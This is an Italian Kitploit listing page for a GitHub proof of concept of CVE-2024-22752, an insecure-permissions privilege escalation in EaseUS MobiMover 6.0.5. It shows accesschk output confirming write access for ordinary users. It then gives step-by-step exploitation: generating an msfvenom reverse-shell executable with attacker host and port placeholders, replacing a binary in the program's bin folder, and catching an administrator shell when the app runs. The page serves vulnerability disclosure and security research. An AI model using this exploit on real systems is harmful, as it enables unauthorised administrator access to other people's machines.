Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-22752 — EaseUS MobiMover 6.0.5 Build 21620 - Permessi non sicuri su file e cartelle | Kitploit
Strumenti/GitHubGitHub/hacker625/cve-2024-22752
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitConfigurazione ErrataBinary Exploitation
GitHubhacker625/cve-2024-22752

CVE-2024-22752

EaseUS MobiMover 6.0.5 Build 21620 - Permessi non sicuri su file e cartelle

Vedi Repository
2 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

EaseUS MobiMover 6.0.5 Build 21620 - Permessi non sicuri su file e cartelle

MobiMoverUILaunch.exe soffre di una vulnerabilità di elevazione dei privilegi che può essere utilizzata da un "Authenticated User" per modificare il file eseguibile del servizio con un binario a sua scelta nella cartella bin. La vulnerabilità esiste a causa di un insieme debole di permessi concessi al "Authenticated Users Group" che concede il flag (M), noto anche come "Modify Privilege"

alt text

Sito del fornitore: https://www.easeus.com/
Link del software: https://down.easeus.com/product/mobimover_trial_setup
Google Drive: https://drive.google.com/file/d/1tqP00IV-WzqNpyE1Rnqwdg_44RxOhINQ/view?usp=sharing
Video POC: https://www.youtube.com/watch?v=FR4cQm-z4Gw

#PoC

root@kitploit:~
C:\Users\creatigon>accesschk -uwvqd "C:\Program Files (x86)\EaseUS\EaseUS MobiMover\bin"

Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\Program Files (x86)\EaseUS\EaseUS MobiMover\bin
  Medium Mandatory Level (Default) [No-Write-Up]
  RW BUILTIN\Users
        FILE_ALL_ACCESS
  RW NT SERVICE\TrustedInstaller
        FILE_ALL_ACCESS
  RW NT AUTHORITY\SYSTEM
        FILE_ALL_ACCESS
  RW BUILTIN\Administrators
        FILE_ALL_ACCESS
  1. Crea un file binario malevolo su Kali Linux con msfvenom
    msfvenom -f exe -p windows/x64/shell_revese_tcp LHOST=<IP> LPORT=<PORT> -f exe -o prepare.exe

  2. Trasferisci il file 'prepare.exe' creato all'host Windows da Kali con accesso utente di basso livello

  3. Sposta il file binario 'prepare.exe' creato in 'C:\Program Files (x86)\EaseUS\EaseUS MobiMover\bin\prepare.exe' per sostituire quello vecchio con accesso utente di basso livello

  4. Quando l'amministratore esegue l'applicazione, otterrai una reverse shell come amministratore

Scarica lo strumento